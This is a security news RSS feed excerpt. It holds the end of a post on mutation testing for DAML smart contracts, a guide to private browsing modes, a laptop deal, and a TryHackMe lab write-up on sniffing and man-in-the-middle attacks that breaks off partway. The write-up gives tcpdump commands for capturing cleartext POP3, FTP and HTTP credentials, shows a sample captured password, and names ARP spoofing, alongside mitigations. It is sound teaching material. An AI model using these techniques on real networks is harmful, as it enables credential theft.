<p>The <code>--coverage-ignore-choice Archive</code> flag deserves a word. Every DAML template automatically gets an implicit <code>Archive</code> choice. It is not part of the business logic under test, so we exclude it for simplicity. With it included, this one-choice template would report 50% even though the test exercises everything we wrote.</p>
<p>Run Mewt on the project and it generates seven mutants. The test suite catches three of them. Four survive. Here is one of the survivors, shown as the diff Mewt reports:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang=""> choice Release : ()
 with
 paid : Decimal
- controller buyer, seller
+ controller seller
 do
 assert (paid == amount)</code></pre>
 <figcaption><span>Figure 4: The controller-removal mutant that survives the test suite</span></figcaption>
</figure>
<p>Re-run the test suite against this mutant. It still passes, and coverage still reports 100%. The contract claims releasing the buyer’s money requires both parties. The mutant lets the seller release it to themselves without the buyer ever confirming delivery. The tests report green either way. Only a test that tries the <em>forbidden</em> path, the seller acting alone, expecting the ledger to reject it, can tell the two contracts apart. No such test exists, and the mutation score says so. (The other three survivors tell the same story from different angles: the buyer-alone twin of this mutant, and two mutants that weaken the <code>paid == amount</code> check to <code>&lt;=</code> and <code>&gt;=</code>, which survive because the test only ever pays the exact amount.)</p>
<p>Step back, and this is the whole point of the exercise. Your tests are the executable specification of your code. Here the implementation changed, one required approval instead of two, and the specification did not react. That means the expected behavior was underspecified all along: whether both the buyer and the seller have to sign off, or just one of them, was never actually written down anywhere a machine could check. Every controller combination type-checks, and coverage reports 100% for all of them. The only place “both must sign” can exist in checkable form is a test that expects the weakened contract to fail, and writing that test is exactly what the surviving mutant tells you to do.</p>
<h2>Limitations and what comes next</h2>
<p>Mewt is not magic. Two limits are worth knowing before you run your first campaign: not every survivor is a real gap, and a campaign costs time. The roadmap that follows them is where we are taking the work next.</p>
<p>Equivalent mutants exist: some survivors turn out to be semantically identical to the original program, so no test could ever catch them. Few public DAML codebases on GitHub come with a full test suite, so we are glad OpenZeppelin open-sourced its <code>canton-stablecoin</code> reference implementation. Mewt generated hundreds of mutants for it. We ran the highest-priority ones through the existing test suite, and seven of those survived. Three were equivalent mutants or sat behind a guard that no path reaches, and the other four were genuine missing test cases. None of the survivors we reviewed pointed to a bug. Such a clean result is what you want when you run Mewt on your own code, and triaging them took minutes.</p>
<p>One of those equivalent mutants shows what that means concretely. A helper computed accrued debt:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">accrueDebt currentDebt lastAccrual now annualRate =
 if currentDebt == 0.0 || annualRate == 0.0 then currentDebt
 else
 let elapsedYears = ... -- elapsed time as a fraction of a year
 in currentDebt * (1.0 + annualRate * elapsedYears)</code></pre>
 <figcaption><span>Figure 5: The accrueDebt helper. Its first-line guard is a shortcut that returns the same value the calculation already produces.</span></figcaption>
</figure>
<p>Mewt forced the <code>if</code> to always take the <code>else</code> branch. No test failed, and none ever could: when the debt is zero, the formula multiplies by zero and returns zero, and when the rate is zero, it multiplies the debt by one and returns it unchanged. The guard is a shortcut that returns the value the formula already produces, so removing it changes nothing. Mewt suppresses the equivalent mutants it can detect. The rest need a reviewer’s judgment to dismiss.</p>
<p>Campaigns cost time in two places. The machine part: Mewt runs your test suite once per mutant, so the wall-clock cost is roughly the number of mutants times how long one test run takes, plus a rebuild if your project needs one. That is minutes on a small codebase and hours on a large one or a slow suite, so the cadence that works is nightly or weekly rather than per-commit. The human part: someone has to look at the survivors. We are working on that front from several directions at Trail of Bits, including our <a href="https://github.com/trailofbits/skills/tree/main/plugins/mutation-testing">mutation-testing skill</a> that helps configure campaigns for your project, and <a href="https://blog.trailofbits.com/2026/04/23/trailmark-turns-code-into-graphs/">Trailmark</a> with its <code>genotoxic</code> triage skill. None of these understand DAML yet, but the direction is clear: given the right harness and tools, the time-consuming parts of a campaign can be handed to AI agents. The effort is modest and the payoff is concrete: each genuine survivor is a specific test you can write, and every test you add makes your suite enforce one more guarantee your contracts are supposed to make.</p>
<p>Also on the roadmap: choice-consumption mutations (<code>consuming</code> vs <code>nonconsuming</code>) sit cleanly on top of the controller-mutation scaffolding and target a bug class Mewt does not yet reach.</p>
<h2>Dive in</h2>
<p>Install Mewt from the <a href="https://github.com/trailofbits/mewt">repository</a>, point a <code>mewt.toml</code> at your project and its test command, and <code>mewt run</code>. The quickstart in the README covers the rest. DAML works out of the box. Everything here ran on Daml 3.4 with <code>dpm</code>, but Mewt just drives whatever test command you configure, so Daml 2 projects using the <code>daml</code> assistant work the same way.</p>
<p>Mutation testing complements the rest of your security stack, the type checkers, linters, and property tests you already run, rather than replacing any of it.</p>
<p>If you’re building on Canton, we help teams with security reviews of DAML applications and with the way the code gets built: working directly with your engineers on the development process itself. <a href="https://www.trailofbits.com/contact/">Contact us</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to go incognito in Chrome, Edge, Firefox, and Safari]]></title>
<description><![CDATA[Private browsing. Incognito. Privacy mode.



Web browser functions like those trace their roots back more than a decade, and the feature — first found in a top browser in 2005 — spread quickly as one copied another, made tweaks and minor improvements.



But privacy-promising labels can be treac...]]></description>
<link>https://tsecurity.de/de/3652543/it-nachrichten/how-to-go-incognito-in-chrome-edge-firefox-and-safari/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652543/it-nachrichten/how-to-go-incognito-in-chrome-edge-firefox-and-safari/</guid>
<pubDate>Tue, 07 Jul 2026 20:51:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Private browsing. Incognito. Privacy mode.</p>



<p>Web browser functions like those trace their roots back more than a decade, and the feature — first found in a top browser in 2005 — spread quickly as one copied another, made tweaks and minor improvements.</p>



<p>But privacy-promising labels can be treacherous. Simply put, going “<a href="https://www.computerworld.com/article/1670600/you-are-not-very-incognito-in-incognito-mode.html" title="Incognito">incognito</a>” is as effective in guarding <a href="https://www.computerworld.com/article/1612064/cookie-conundrum-the-loss-of-third-party-trackers-could-diminish-your-privacy.html">online privacy</a> as witchcraft is in warding off a common cold.</p>



<p>That’s because private browsing is intended to wipe <i>local</i> traces of where you’ve been, what you’ve searched for, the contents of forms you’ve filled. It’s meant to hide, and not always conclusively at that, your tracks from others with access to the personal computer. That’s it.</p>



<h2 class="wp-block-heading">How to keep web browsing private</h2>



<p>We’ve spelled out how to go into incognito or private browsing mode for the four major browsers in this order: </p>



<ul class="wp-block-list">
<li>Google Chrome’s Incognito mode</li>



<li>Microsoft Edge’s InPrivate browsing</li>



<li>Mozilla Firefox’s New Private Window mode</li>



<li>Apple Safari’s New Private window mode</li>
</ul>



<p>At their most basic, these features promise that they won’t record visited sites to the browsing history, save cookies that show you’ve been to and logged into sites, or remember credentials like passwords used during sessions. But your traipses through the web are still <a href="https://www.computerworld.com/article/1611809/what-a-future-without-browser-cookies-will-look-like.html">traceable by Internet providers</a> – and the authorities who serve subpoenas to those entities – employers who control the company network and advertisers who follow your every footstep.</p>



<p>To end that cognitive dissonance, <a href="https://www.computerworld.com/article/1639403/online-privacy-best-browsers-settings-and-tips.html">most browsers have added more advanced privacy tools</a>, generically known as “anti-trackers,” which block various kinds of bite-sized chunks of code that advertisers and websites use to trace where people go in attempts to compile digital dossiers or serve targeted advertisements.</p>



<p>Although it might seem reasonable that a browser’s end game would be to craft a system that blends incognito modes with anti-tracking, it’s highly unlikely. Using either private browsing or anti-tracking carries a cost: site passwords aren’t saved for the next visit or sites break under the tracker scrubbing. Nor are those costs equal. It’s much easier to turn on some level of anti-tracking by default than it would be to do the same for private sessions, as evidenced by the number of browsers that do the former without complaint while <i>none</i> do the latter.</p>



<p>Private browsing will, by necessity, always be a niche, as long as sites rely on cookies for mundane things like log-ins and cart contents.</p>



<p>But the mode remains a useful tool whenever the browser — and the computer it’s on — are shared. To prove that, we’ve assembled instructions and insights on using the incognito features — and anti-tracking tools — offered by the top four browsers: <a title="Google Chrome" href="https://www.computerworld.com/article/1719300/a-mac-user-s-guide-to-the-google-chrome-browser.html">Google Chrome</a>, Microsoft’s <a href="https://www.computerworld.com/article/1713244/how-to-replace-edge-as-windows-default-browser.html">Chromium-based Edge</a>, Mozilla’s Firefox and Apple’s Safari.</p>



<h2 class="wp-block-heading">How to go incognito with Google Chrome</h2>



<p>Although <i>incognito</i> may be a synonym to some users for any browser’s private mode, Google gets credit for grabbing the word as the feature’s snappiest name when it launched the tool in late 2008, just months after Chrome debuted.</p>



<p>The easiest way to open an Incognito window is with the keyboard shortcut combination <strong>Ctrl-Shift-N</strong> (Windows) or <strong>Command-Shift-N</strong> (macOS).</p>



<p>Another way is to click on the menu on the upper right — it’s the three vertical dots — and select <strong>New Incognito Window</strong> from the list.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="876" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Open a new Incognito window in Chrome using keyboard shortcuts or from the menu by choosing “New Incognito window.”</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p>The new Incognito window can be recognized by the dark background and the stylized “spy” icon just to the left of the three-dots menu. Chrome also reminds users of just what Incognito does and doesn’t do each time a new window is opened. The message may get tiresome for regular Incognito users, but it may also save a job or reputation; it’s important that users remember Incognito doesn’t prevent ISPs, businesses, schools and organizations from knowing where customers, workers, students, and others went on the web or what they searched for.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="699" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Each time a new Incognito window is opened, Chrome reminds users what Incognito doesn’t save. The browser also puts a toggle on the screen for blocking third-party cookies.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p>Incognito’s introductory screen also displays a toggle — it’s on by default — along with text that states third-party cookies will be blocked while in the privacy mode. Although cookies are never saved locally as long as the user stays in Incognito, websites have been able to track user movements from site to site <i>while within Incognito</i>. Such tracking might be used, for example, to display ads to a user visiting multiple sites in Incognito. This third-party cookie blocking, which halts such behavior, debuted in May 2020.</p>



<p>Google has been experimenting with new language on Chrome’s Incognito introductory page, but it’s yet to make it to the desktop browser. In the Canary build of Chrome on Android, however, the intro now outlines “What Incognito does” and “What Incognito doesn’t do,” to make the mode’s capabilities somewhat clearer to the user. (Some have speculated that the changes were made in reaction to a still-ongoing class-action lawsuit file in 2020 that alleged Google continued to track users’ online behavior and movements in Incognito.)</p>



<p>Once a tab in Incognito has been filled with a website, Chrome continues to remind users that they’re in Incognito by the dark background of the address bar and window title.</p>



<p>A link on an existing page can be opened directly into Incognito by right-clicking the link, then choosing <strong>Open Link in Incognito Window</strong> from the resulting menu.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="876" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>What Incognito looks like after pulling up a website. Note the “spy” icon at the right of the address bar.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p><strong>Pro tip</strong><em><strong>:</strong> To close an Incognito window, shutter it like any other Chrome window by clicking the X in the upper right corner (Windows) or the red dot in the upper left (macOS).</em></p>



<h2 class="wp-block-heading">How to privately browse with Microsoft Edge</h2>



<p>Microsoft borrowed the name of its private browsing mode, InPrivate, from Internet Explorer (IE), the finally-being-retired legacy browser. InPrivate appeared in IE in March 2009, about three months after Chrome’s Incognito and three months before Firefox’s privacy mode. When Edge was first released in 2015 and then relaunched as a clone of Chrome in January 2020, InPrivate was part of the package, too.</p>



<p>At the keyboard, the combination of <strong>Ctrl-Shift-N</strong> (Windows) or <strong>Command-Shift-N</strong> (macOS) opens an InPrivate window.</p>



<p>A slower way to get there is to click on the menu at the upper right — it’s three dots arranged horizontally — and choose <strong>New InPrivate Window</strong> from the menu.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="874" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Like other browsers, Edge will take you incognito from the menu when you pick New InPrivate window.</p>
</figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p>Edge does a more thorough job of explaining what its private browsing mode does and doesn’t do than any of its rivals, with on-screen paragraphs dedicated to describing what data the browser collects in InPrivate and how the strictest additional anti-tracking setting can be called on from within the mode. In addition, Edge uses the more informal “What Incognito does” and “What Incognito doesn’t do” language on its InPrivate introductory screen.</p>



<p>Microsoft’s browser also well marks InPrivate when the mode is operating: an oval marked “In Private” to the right of the address bar combines with a full-black screen to make sure users know where they’re at.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="843" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Edge offers a detailed explanation of what its private browsing mode does and doesn’t do.</p>
</figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p>It’s also possible to launch an InPrivate session by right-clicking a link within Edge and selecting <strong>Open in InPrivate Window</strong>. That option is grayed out when already in a private browsing session but using <strong>Open Link in New Tab</strong> does just that within the current InPrivate frame.</p>



<p>To end InPrivate browsing, simply shut the window by clicking the X in the upper right corner (Windows) or click the red dot at the upper left (macOS).</p>



<p>Although Edge is based on Chromium, the same open-source project that comes up with the code to power Chrome, the Redmond, WA company integrated anti-tracking into its browser. Dubbed “Tracking Prevention,” it works both in Edge’s standard and InPrivate modes.</p>



<p>To set Tracking Prevention, choose <strong>Settings</strong> from the three-ellipses menu at the right, then at the next page, pick <strong>Privacy, Search and Services</strong>. Choose one of the three options — <strong>Basic, Balanced</strong> or <strong>Strict</strong> — and make sure the toggle for <strong>Tracking prevention</strong> is in the “on” position. If you want InPrivate to always default to the harshest anti-tracking — not a bad idea — toggle <strong>Always use “Strict” tracking prevention when browsing InPrivate</strong> to “on.”</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="708" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Toggle Always use Strict to the ‘on’ position and InPrivate will apply the most stringent anti-tracking even though Edge’s standard mode is set to, say, Balanced.</p>
</figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p><strong>Pro tip:</strong> <i>To open Edge with InPrivate — rather than first opening Edge in standard mode, then launching InPrivate — right-click the Edge icon in the Windows taskbar and select <strong>New InPrivate Window</strong> from the list. There is no similar one-step way to do this in macOS.</i></p>



<h2 class="wp-block-heading">How to privately browse with Mozilla Firefox</h2>



<p>After Chrome trumpeted Incognito, browsers without something similar hustled to catch up. Mozilla added its take — dubbed Private Browsing — about six months after Google, in June 2009.</p>



<p>From the keyboard, a private browsing session can be called up using the combination <strong>Ctrl-Shift-P</strong> (Windows) or <strong>Command-Shift-P</strong> (macOS).</p>



<p>Alternately, a private window will open from the menu at the upper right of Firefox — three short horizontal lines — after selecting <strong>New private window</strong>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="889" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Opening a private browsing window is as simple as choosing New Private Window from the Firefox menu.</p>
</figcaption></figure><p class="imageCredit">Mozilla</p></div>



<p>A private session window is marked by the purple “mask” icon in the title bar of the Firefox frame. In Windows, the icon is to the left of the minimize/maximize/close buttons; on a Mac, the mask squats at the far right of the title bar. Unlike Chrome and Edge, Firefox does not color-code the top components of the browser window to signify the user is in privacy mode.</p>



<p>Like other browsers, Firefox warns users that private browsing is no cure-all for privacy ills but is limited in what it blocks from being saved during a session. “Private window: Firefox clears your search and browsing history when you close all private windows. This doesn’t make you anonymous,” the caution reads.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="654" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Firefox reminds users that while a private session doesn’t save searches or browsing histories, it doesn’t cloak them in complete anonymity. The page also links to more detailed information.</p>
</figcaption></figure><p class="imageCredit">Mozilla</p></div>



<p>A link can be opened into a Firefox Private Window by right-clicking the link, then choosing <strong>Open Link in New Private Window</strong> from the menu.</p>



<p>To close a Private Window, shut it down just as one would any Firefox window by clicking the X in the upper right corner (Windows) or the red dot in the upper left (macOS).</p>



<p>Notable is that Firefox’s private browsing mode is accompanied by the browser’s superb “Enhanced Tracking Protection,” a suite of tracker blocking tools that stymie all sorts of ad-and-site methods for identifying users, then watching and recording their online behavior. While the earliest version of this was offered only inside Private Windows, the expanded technologies also work within standard mode.</p>



<p>Because Enhanced Tracking Protection is enabled by default within Firefox, it doesn’t matter which of its settings — <strong>Standard, Strict</strong> or <strong>Custom</strong> — is selected as far as private browsing goes; everything that can be blocked will be blocked.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>The shield appears in the address bar to note what trackers were blocked by Firefox in a Private Window. Clicking on the icon brings up an accounting of what was barred.</p>
</figcaption></figure><p class="imageCredit">Mozilla</p></div>



<p><strong>Pro tip:</strong> <i>Private Browsing sessions take place over the more secure HTTPS, not the once-standard HTTP protocol. Users don’t need to do anything: The new HTTPS-only policy is on by default. (If the destination site doesn’t support HTTPS, Firefox will go into fallback mode, connecting via HTTP instead.)</i></p>



<h2 class="wp-block-heading">How to browse privately with Apple’s Safari</h2>



<p>Chrome may get far more attention for its Incognito than any other browser — no surprise, since it’s by far the most popular browser on the planet — but Apple’s Safari was actually the first to introduce private browsing. The term <i>private browsing</i> was first bandied in 2005 to describe early Safari features that limited what was saved by the browser.</p>



<p>Side note: Early in private browsing, the label <i>porn mode</i> was often used as a synonym to describe what many writers and reporters assumed was the primary application of the feature. The term has fallen out of favor.</p>



<p>To open what Safari calls a Private Window on a Mac, users can do a three-key combination of <strong>Command-Shift-N</strong>, the same shortcut Chrome adopted. Otherwise, a window can be called up by selecting the <strong>File</strong> menu and clicking on New Private Window.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="803" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>From the File menu in Safari, selecting New Private Window gets you started.</p>
</figcaption></figure><p class="imageCredit">Apple</p></div>



<p>Safari tags each Private Window by darkening the address bar. It also issues a reminder of what it does — or more accurately — what it doesn’t do. “Safari will keep your browsing history private for all tabs of this window. After you close this window, Safari won’t remember the pages you visited, your search history or your AutoFill information,” the top-of-the-page note reads. The warning is more terse than those of other browsers and omits cautions about still-visible online activity.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="321" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>The darkened address bar at the top — and the Private button in the left window corner — signal that this Safari window is for private browsing.</p>
</figcaption></figure><p class="imageCredit">Apple</p></div>



<p>Like Firefox, Safari automatically engages additional privacy technologies, whether the user browses in standard or private mode. Safari’s Intelligent Tracking Protection (ITP), which has been around for nearly a decade and repeatedly upgraded, now blocks all third-party cookies, among other components advertisers and services use to track people as they bounce from one site to another. ITP is controlled by a single on-off switch — on is the default — found in <strong>Preferences</strong> under the <strong>Privacy</strong> icon. If the <strong>Website tracking:</strong> box is checked to mark <strong>Prevent cross-site tracking</strong>, ITP is on.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="453" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Switching on cross-site tracking enables Safari’s Intelligent Tracking Protection, which blocks a wide variety of bits advertisers try to use to follow you around the web while you’re using a Private Window.</p>
</figcaption></figure><p class="imageCredit">Apple</p></div>



<p>A link can be opened directly to a Private Window by right-clicking, then selecting <strong>Open Link in New Private Window</strong>. Close a Private Window just as any Safari window, by clicking the red dot in the upper left corner of the browser frame.</p>



<p><strong>Pro tip:</strong> <i>Once in a Safari Private Window, opening a new tab — either by clicking the + icon at the upper right or by using the Command-T key combo — omits the Private Browsing Enabled notice. (The darkened address bar remains as the sole indicator of a private browsing session.) Other browsers, such as Firefox, repeat their cautionary messages each time a tab is opened in an incognito session.</i></p>



<p><strong>Related reading:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/1717405/googles-chromium-browser-explained.html">Chromium explained: How the open-source engine drives today’s browsers</a></li>



<li><a href="https://www.computerworld.com/article/4083528/ai-web-browsers-are-cool-helpful-and-utterly-untrustworthy.html">AI web browsers are cool, helpful, and utterly untrustworthy</a></li>



<li><a href="https://www.computerworld.com/article/3996011/ai-windows-web-browser.html">How AI will transform your Windows web browser</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple's 15-inch MacBook Air M5 dips to $1,349 in today's price war]]></title>
<description><![CDATA[Amazon and B&H are competing for your business by offering a $150 discount on Apple's current 15-inch MacBook Air with an M5 chip.Grab deals on MacBook Air models at Amazon and B&H - Image credit: AppleYou can pick up the M5 MacBook Air 15-inch at the discounted price of $1,349 when you opt for t...]]></description>
<link>https://tsecurity.de/de/3652450/ios-mac-os/apples-15-inch-macbook-air-m5-dips-to-1349-in-todays-price-war/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652450/ios-mac-os/apples-15-inch-macbook-air-m5-dips-to-1349-in-todays-price-war/</guid>
<pubDate>Tue, 07 Jul 2026 20:10:23 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Amazon and B&amp;H are competing for your business by offering a $150 discount on Apple's current 15-inch MacBook Air with an M5 chip.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68185-143740-macbook-air-deals-july-2026-xl.jpg" alt="Laptop with abstract blue screen graphics on a red and blue gradient background, overlaid by large white text reading DEALS, suggesting a technology sale or discount promotion" height="720"><br><span>Grab deals on MacBook Air models at Amazon and B&amp;H - Image credit: Apple</span></div><br>You can pick up the M5 MacBook Air 15-inch at the discounted price of $1,349 when you opt for the sleek Midnight finish at Amazon and B&amp;H.<br><br><ul><br><br><br> <a href="https://appleinsider.com/articles/26/07/07/apples-15-inch-macbook-air-m5-dips-to-1349-in-todays-price-war?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244894?urm_source=rss">Discuss on our Forums</a></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Protocols and Servers 2 TryHackMe Writeup]]></title>
<description><![CDATA[Somewhere on a network right now, a username and password are crossing the wire in plain, readable text — and someone could be quietly reading them.No exploit. No zero-day. Just a protocol that was never built to keep a secret.That’s the uncomfortable little truth this room is built around. So le...]]></description>
<link>https://tsecurity.de/de/3646317/hacking/protocols-and-servers-2-tryhackme-writeup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646317/hacking/protocols-and-servers-2-tryhackme-writeup/</guid>
<pubDate>Sun, 05 Jul 2026 08:39:11 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>Somewhere on a network right now, a username and password are crossing the wire in plain, readable text — and someone could be quietly reading them.</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/900/1*7OqFQcrh6OcgOZyqGjAyqw.png"></figure><p>No exploit. No zero-day. Just a protocol that was never built to keep a secret.</p><p>That’s the uncomfortable little truth this room is built around. So let’s pull it apart.</p><p>Most of the internet’s classic protocols were designed in a more trusting era. It was a time when the people sharing a network mostly knew each other, and “someone might be listening” wasn’t the default assumption.</p><p>Those protocols still run everywhere. And many of them still send your credentials across the wire in plain text.</p><p><strong>Protocols and Servers 2</strong> on TryHackMe is about exactly that gap, and what closes it. It walks through three foundational attacks against network protocols, then the defenses that neutralize each one:</p><ul><li>Sniffing — quietly reading traffic off the wire</li><li>Man-in-the-Middle (MITM) — sitting between two parties and tampering</li><li>Password attacks — guessing or cracking the credentials themselves</li></ul><p>This is a writeup of the whole room: the concepts in plain language, the commands that matter, and the task answers explained. If you’re working through it yourself, follow along.</p><blockquote>One idea ties the entire room together: cleartext protocols are insecure by design. Everything else is a consequence of that single fact.</blockquote><h3>Part 1 — Sniffing Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/911/1*mxa7u-z6cA7UEL5f8tjJQg.png"></figure><p>A <strong>sniffing attack</strong> is the simplest idea in the room: use a packet-capture tool to grab traffic as it crosses the network, then read it.</p><p>If a protocol talks in cleartext, anyone positioned to see that traffic can pull out private messages or login credentials. Nothing is encrypted before it leaves your machine.</p><pre>"Isn't everything encrypted now?"</pre><p>It’s tempting to think sniffing is a solved, retro problem now that TLS is everywhere. It isn’t. It stays dangerous wherever cleartext still lives:</p><ul><li><strong>Internal corporate networks</strong>, where machine-to-machine traffic is often left unencrypted</li><li><strong>Legacy systems </strong>like old mail servers, embedded devices, and industrial control systems</li><li><strong>Misconfigured services</strong> where TLS is available but not strictly enforced</li><li><strong>IoT devices</strong> that habitually use plain protocols</li><li><strong>Wireless networks</strong>, where anyone in range can listen</li><li>After a MITM attack that has successfully downgraded or stripped encryption</li></ul><blockquote>In real internal pentests and red-team work, sniffing is still one of the most reliable ways to harvest credentials and learn how systems actually talk to each other.</blockquote><h3>The tools</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xBxcZK8PVBApVtltOosP4Q.jpeg"><figcaption>Wireshark</figcaption></figure><p>Capturing packets needs a network card and the right privileges (root on Linux, administrator on Windows). Here are the staples:</p><ul><li><strong>tcpdump</strong> — lightweight open-source CLI capture tool, preinstalled on most Linux systems.</li><li><strong>Wireshark</strong> — the GUI standard, with powerful filtering, protocol dissection, and visualization.</li><li><strong>tshark</strong> — Wireshark’s command-line sibling, great for scripting.</li></ul><blockquote>Worth knowing too: <strong>tcpflow</strong> (reassembles TCP streams), <strong>ngrep</strong> (pattern-matching in traffic), and <strong>NetworkMiner</strong> (extracts files from captures).</blockquote><blockquote>Specialized credential-grabbers exist, but tcpdump and Wireshark can do the job with a little effort.</blockquote><h3>Capturing POP3 credentials with tcpdump</h3><p>The classic demo: a user checks email over POP3 (port 110, cleartext).</p><p>With access to the traffic — via a wiretap, a switch’s port mirroring, ARP spoofing, a compromised host, or a successful MITM — you run this command:</p><pre>sudo tcpdump port 110 -A</pre><p>Breaking that down:</p><ul><li>sudo — packet capture needs root privileges.</li><li>port 110 — only keep traffic to or from the POP3 server.</li><li>-A — print packet contents as ASCII, so cleartext is human-readable.</li></ul><p>In the capture, the login arrives across two packets and reads straight out:</p><pre>… USER frank … PASS D2xc9CgD</pre><p>Username frank, password D2xc9CgD, handed over in plain sight.</p><blockquote>Wireshark gets you there even faster: type “pop” in the display filter, and only POP3 traffic remains, credentials included.</blockquote><h4>Handy tcpdump filters</h4><pre>+------------------------------------+-----------------------------------------------------------+<br>| Command                            | Purpose                                                   |<br>+------------------------------------+-----------------------------------------------------------+<br>| sudo tcpdump port 110 -A           | Capture traffic on port 110 (POP3) in readable ASCII      |<br>| sudo tcpdump host 10.20.30.148 -A  | Capture ASCII traffic to/from a specific host IP          |<br>| sudo tcpdump port 80 -A            | Capture HTTP traffic (credentials in POST data)           |<br>| sudo tcpdump port 21 -A            | Capture FTP traffic (cleartext credentials)               |<br>| sudo tcpdump -w capture.pcap       | Save raw network packets to a file for later analysis     |<br>| tcpdump -r capture.pcap -A         | Read and display a saved capture file in ASCII text       |<br>+------------------------------------+-----------------------------------------------------------+</pre><h4>Mitigation</h4><p>Any cleartext protocol is exposed. The only requirement for the attack is a vantage point between the two parties or on the same network segment.</p><p>The core fix is encryption. This means wrapping the protocol in TLS (like HTTP to HTTPS, FTP to FTPS, or POP3 to POP3S) and replacing Telnet with SSH.</p><p>Layered on top of that:</p><ul><li>Network segmentation to limit who can see whose traffic</li><li>Encrypted VLANs or tunnels for sensitive internal traffic</li><li>802.1X port-based authentication so unknown devices can’t connect</li><li>Zero-trust thinking: treat every network as hostile and encrypt everything</li><li>Monitoring for ARP spoofing and other redirection to catch sniffing in progress</li></ul><p>Question: How do you capture only Telnet traffic with tcpdump? Answer: Telnet runs on port 23, so you add “port 23”.</p><p>Question: What is the simplest Wireshark display filter for IMAP? Answer: “imap”.</p><h3>Part 2 — Man-in-the-Middle (MITM) Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/678/1*uImWCNSpEizR46XoZzoc7g.png"><figcaption>Man-in-the-Middle Attack</figcaption></figure><p>Sniffing is passive listening. A <strong>MITM attack</strong> is active.</p><p>The attacker slips between two parties (A and B) so that A thinks it’s talking to B, while everything actually flows through the attacker. They can read and completely alter the data.</p><p>The room’s example says it best: A asks to transfer $20, the attacker rewrites the amount mid-flight, and B acts on the tampered message.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*C0zge6WQ4_HZjbPjnt1i0g.png"><figcaption>Image 1 from the room</figcaption></figure><p>It works whenever the protocol doesn’t verify the authenticity and integrity of each message.</p><h4>Getting into the middle</h4><p>To sit between two parties, an attacker has to redirect traffic through their own machine. Common routes include:</p><ul><li><strong>ARP spoofing</strong> — on a local network, the attacker sends forged ARP messages tying their own MAC address to the gateway’s IP, routing traffic directly to them.</li><li><strong>DNS spoofing </strong>— feeding false DNS answers to send victims to attacker-controlled servers.</li><li><strong>Rogue access points </strong>— fake Wi-Fi setups (like 